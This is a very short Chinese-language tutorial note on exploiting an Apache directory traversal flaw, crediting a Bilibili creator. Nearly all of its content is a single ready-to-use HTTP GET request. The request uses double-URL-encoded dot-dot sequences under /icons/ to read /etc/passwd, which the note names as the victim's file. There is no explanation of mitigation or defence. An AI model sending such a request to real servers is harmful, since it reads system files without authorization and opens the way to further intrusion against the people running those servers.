前言

Apache目录穿越漏洞利用

漏洞利用

/etc/passwd:受害者被读取的文件

request
1
GET http://example.com/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65%%32%65%%32%65/etc/passwd

完成

参考文献

哔哩哔哩——xiaodisec